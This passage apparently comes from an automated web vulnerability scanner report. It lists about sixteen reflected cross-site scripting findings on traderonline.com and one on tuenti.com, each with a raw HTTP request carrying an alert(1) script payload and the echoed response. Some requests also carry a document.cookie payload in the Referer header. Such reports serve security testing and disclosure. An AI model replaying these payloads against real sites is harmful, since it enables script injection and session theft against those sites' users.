Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:27:10 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/cssc89f8<script>alert(1)</script>f02bcd6ebe0/promoCSS.php</span>
...[SNIP]...

4.1458. http://www.traderonline.com/css/tolhomecss.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /css/tolhomecss.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b116<script>alert(1)</script>87d127fc818 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9b116<script>alert(1)</script>87d127fc818/tolhomecss.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; s_pers=%20s_nr%3D1295884785350%7C1298476785350%3B%20s_lv%3D1295884785352%7C1390492785352%3B%20s_lv_s%3DFirst%2520Visit%7C1295886585352%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.2.10.1295884751

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:27:22 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27597


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/css9b116<script>alert(1)</script>87d127fc818/tolhomecss.php</span>
...[SNIP]...

4.1459. http://www.traderonline.com/find/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /find/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c090<script>alert(1)</script>a2d1c9763c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /find7c090<script>alert(1)</script>a2d1c9763c0/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:17 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27584


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/find7c090<script>alert(1)</script>a2d1c9763c0/</span>
...[SNIP]...

4.1460. http://www.traderonline.com/javascript/master_s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /javascript/master_s_code.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 36fb8<script>alert(1)</script>9b8e187e065 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript36fb8<script>alert(1)</script>9b8e187e065/master_s_code.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:27:03 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27606


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/javascript36fb8<script>alert(1)</script>9b8e187e065/master_s_code.js</span>
...[SNIP]...

4.1461. http://www.traderonline.com/javascript/realmedia.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /javascript/realmedia.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 36485<script>alert(1)</script>f3a99f08b5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript36485<script>alert(1)</script>f3a99f08b5b/realmedia.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:38 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27602


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/javascript36485<script>alert(1)</script>f3a99f08b5b/realmedia.js</span>
...[SNIP]...

4.1462. http://www.traderonline.com/myt/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /myt/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f084<script>alert(1)</script>775c491c35d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myt5f084<script>alert(1)</script>775c491c35d/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:19 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27583


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/myt5f084<script>alert(1)</script>775c491c35d/</span>
...[SNIP]...

4.1463. http://www.traderonline.com/myt/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /myt/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e958"%3balert(1)//68c3f4dfbcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3e958";alert(1)//68c3f4dfbcd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myt/?3e958"%3balert(1)//68c3f4dfbcd=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:07 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 35274


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>MyTrader - Save, Modify, Delete Vehicles for Sale - TraderOnline.com</title>
   <meta name="description" content="U
...[SNIP]...
<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?3e958";alert(1)//68c3f4dfbcd=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1464. http://www.traderonline.com/privacy-policy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /privacy-policy/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95fcd<script>alert(1)</script>8ca7cdf2e27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy-policy95fcd<script>alert(1)</script>8ca7cdf2e27/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27594


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/privacy-policy95fcd<script>alert(1)</script>8ca7cdf2e27/</span>
...[SNIP]...

4.1465. http://www.traderonline.com/research/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /research/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5b765<script>alert(1)</script>14da2687f8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /research5b765<script>alert(1)</script>14da2687f8b/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27588


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/research5b765<script>alert(1)</script>14da2687f8b/</span>
...[SNIP]...

4.1466. http://www.traderonline.com/security/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /security/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec6df<script>alert(1)</script>04ceb87c2eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /securityec6df<script>alert(1)</script>04ceb87c2eb/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:33 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27588


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/securityec6df<script>alert(1)</script>04ceb87c2eb/</span>
...[SNIP]...

4.1467. http://www.traderonline.com/security/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /security/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af3e2"%3balert(1)//10f0b96a9fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as af3e2";alert(1)//10f0b96a9fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /security/?af3e2"%3balert(1)//10f0b96a9fe=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:00 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 40601


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TraderOnline.com Safety &amp; Fraud Center - Protect Yourself from Online Fraud</title>
   <meta name="description"
...[SNIP]...
<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?af3e2";alert(1)//10f0b96a9fe=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1468. http://www.traderonline.com/sell/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /sell/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fecde<script>alert(1)</script>d30d288ed03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sellfecde<script>alert(1)</script>d30d288ed03/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:21 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27584


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/sellfecde<script>alert(1)</script>d30d288ed03/</span>
...[SNIP]...

4.1469. http://www.traderonline.com/sitemap/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff701<script>alert(1)</script>48128bf00f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemapff701<script>alert(1)</script>48128bf00f4/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:01 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27587


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/sitemapff701<script>alert(1)</script>48128bf00f4/</span>
...[SNIP]...

4.1470. http://www.traderonline.com/terms-of-use/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /terms-of-use/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 42768<script>alert(1)</script>a6b1bbad8b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /terms-of-use42768<script>alert(1)</script>a6b1bbad8b5/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:47 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27592


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/terms-of-use42768<script>alert(1)</script>a6b1bbad8b5/</span>
...[SNIP]...

4.1471. http://www.traderonline.com/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /x22

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec89d<script>alert(1)</script>93a08fbf703 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /x22ec89d<script>alert(1)</script>93a08fbf703 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:12:07 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27582


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/x22ec89d<script>alert(1)</script>93a08fbf703</span>
...[SNIP]...

4.1472. http://www.traderonline.com/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 522a7<script>alert(1)</script>3f4e0a626ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /x22?522a7<script>alert(1)</script>3f4e0a626ca=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:12:03 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27585


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/x22?522a7<script>alert(1)</script>3f4e0a626ca=1</span>
...[SNIP]...

4.1473. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a61"><script>alert(1)</script>29d0ea3ffb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /share?15a61"><script>alert(1)</script>29d0ea3ffb0=1 HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
